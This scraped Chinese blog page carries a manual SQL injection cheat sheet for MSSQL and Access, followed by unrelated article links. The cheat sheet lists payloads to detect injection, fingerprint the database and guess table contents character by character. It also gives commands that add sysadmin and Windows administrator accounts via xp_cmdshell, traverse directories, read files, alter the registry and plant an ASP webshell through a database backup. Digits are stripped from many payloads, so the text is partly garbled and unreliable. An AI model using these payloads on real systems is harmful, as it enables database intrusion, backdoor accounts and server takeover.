.判断是否有注入;and = ;and =
  .初步判断是否是mssql ;and user>   .注入参数是字符and [查询条件] and =   .搜索时没过滤参数的and [查询条件] and %=   .判断数据库系统   ;and (select count(*) from sysobjects)> mssql   ;and (select count(*) from msysobjects)> access   .猜数据库 ;and (select Count(*) from [数据库名])>   .猜字段 ;and (select Count(字段名) from 数据库名)>   .猜字段中记录长度 ;and (select top len(字段名) from 数据库名)>   .()猜字段的ascii值(access)   ;and (select top asc(mid(字段名,,)) from 数据库名)>   ()猜字段的ascii值(mssql)   ;and (select top unicode(substring(字段名,,)) from 数据库名)>   .测试权限结构(mssql)   ;and =(select IS_SRVROLEMEMBER(sysadmin));--   ;and =(select IS_SRVROLEMEMBER(serveradmin));--   ;and =(select IS_SRVROLEMEMBER(setupadmin));--   ;and =(select IS_SRVROLEMEMBER(securityadmin));--   ;and =(select IS_SRVROLEMEMBER(diskadmin));--   ;and =(select IS_SRVROLEMEMBER(bulkadmin));--   ;and =(select IS_MEMBER(db_owner));--   .添加mssql和系统的帐户   ;exec master.dbo.sp_addlogin username;--
  ;exec master.dbo.sp_password null,username,password;--   ;exec master.dbo.sp_addsrvrolemember sysadmin username;--   ;exec master.dbo.xp_cmdshell net user username password   /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add;--   ;exec master.dbo.xp_cmdshell net user username password /add;--   ;exec master.dbo.xp_cmdshell net localgroup administrators username /add;--   .()遍历目录   ;create table dirs(paths varchar(), id int)   ;insert dirs exec master.dbo.xp_dirtree c:   ;and (select top paths from dirs)>   ;and (select top paths from dirs where paths not in(上步得到的paths))>)   ()遍历目录   ;create table temp(id nvarchar(),num1 nvarchar(),num2 nvarchar(),num3 nvarchar());--
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   ;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 获得子目录列表   ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 获得所有子目录的目录树构   ;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看文件的内容   .mssql中的存储过程   xp_regenumvalues 注册表根键, 子键   ;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值   xp_regread 根键,子键,键值名   ;exec xp_regread   HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir 返回制定键的值   xp_regwrite 根键,子键, 值名, 值类型, 值   值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型   ;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName,reg_sz,hello 写入注册表   xp_regdeletevalue 根键,子键,值名   exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName 删除某个值   xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey 删除键,包括该键下所有值   .mssql的backup创建webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=c:l.asp;   .mssql内置函数   ;and (select @@version)> 获得Windows的版本号   ;and user_name()=dbo 判断当前系统的连接用户是不是sa   ;and (select user_name())> 爆当前系统的连接用户   ;and (select db_name())> 得到当前连接的数据库   .简洁的webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=g:wwwtestl.asp;

手动方式SQL注入脚本命令之精华版的更多相关文章

  1. SQL注入常用命令

    1. 数据库查询版本 Mssql select @@version Mysql select vresion()/select @@version oracle select banner from ...

  2. phpcms v9 sql注入脚本

    phpcms v9 SQL注入脚本 用法:python phpcms.py http://www.baidu.com import requests,sys,urllib url = sys.argv ...

  3. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

  4. 安全测试5_服务端的安全漏洞(SQL注入、命令注入、文件操作类)

    前面大致讲解了下客户端的安全漏洞,现在来讲解下服务端的安全漏洞. 1.SQL注入(SQL Injection),是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库 ...

  5. 常规SQL注入脚本

    一:union报错注入 猜字段长度:order by 28 先显示位http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9 当前数 ...

  6. SQL注入脚本(基于时间)

    #encoding=utf-8 import httplib import time import string import sys import urllib header = {'Accept' ...

  7. 禁用substr、substring、mid函数的sql注入脚本

    #encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding('utf-8') payloads = l ...

  8. SQL注入技术专题—由浅入深【精华聚合】

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23569276来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 不管用什么语言编写的Web应用 ...

  9. SQL注入学习资料总结

    转载自:https://bbs.ichunqiu.com/thread-12105-1-1.html  什么是SQL注入 SQL注入基本介绍 结构化查询语言(Structured Query Lang ...

随机推荐

  1. 《Java并发编程实战》第九章 图形用户界面应用程序界面 读书笔记

    一.为什么GUI是单线程化 传统的GUI应用程序通常都是单线程的. 1. 在代码的各个位置都须要调用poll方法来获得输入事件(这样的方式将给代码带来极大的混乱) 2. 通过一个"主事件循环 ...

  2. JavaScript 纯粹对象

    JavaScript 纯粹对象 1.定义: 通过 "{}" 或者 "new Object" 创建的对象,像new Date(),new String()都不是纯 ...

  3. JavaScript原生实现《贪吃蛇》

    概述 JavaScript原生实现<贪吃蛇>,每吃掉一个食物,蛇的身体会变长,食物会重新换位置. 详细 代码下载:http://www.demodashi.com/demo/10728.h ...

  4. [CXF REST标准实战系列] 二、Spring4.0 整合 CXF3.0,实现测试接口(转)

    转自:[CXF REST标准实战系列] 二.Spring4.0 整合 CXF3.0,实现测试接口 文章Points: 1.介绍RESTful架构风格 2.Spring配置CXF 3.三层初设计,实现W ...

  5. java配置使用手册

    进行java开发,首先要安装jdk,安装了jdk后还要进行环境变量配置: 1.下载jdk(http://java.sun.com/javase/downloads/index.jsp),我下载的版本是 ...

  6. HDUOJ---三角形(组合数学)

    http://acm.hdu.edu.cn/showproblem.php?pid=1249 三角形 Time Limit: 2000/1000 MS (Java/Others)    Memory ...

  7. DataSnap使用UniDac处理自增长字段

    原来使用ado来访问数据库,用在DataSnap中也很方便.后来便一直使用UniDac,可发现UniDac如果用在DataSnap中要比ado麻烦很多,尤其对自增长字段.缺省值的处理上,感觉对Data ...

  8. Eclipse 去掉JavaScript Validator

    http://www.cnblogs.com/wucg/archive/2012/08/06/2625458.html eclipse有些时候,javascript文件总是通不过eclipse的编译校 ...

  9. Chrome浏览器桌面通知提示功能使用

    http://www.cnblogs.com/meteoric_cry/archive/2012/03/31/2426256.html

  10. 学习WCF笔记之二

    一.学习文章http://www.cnblogs.com/iamlilinfeng/archive/2012/09/25/2700049.html 二.步骤 学习WFC,按照大神的文章一步步学习,不过 ...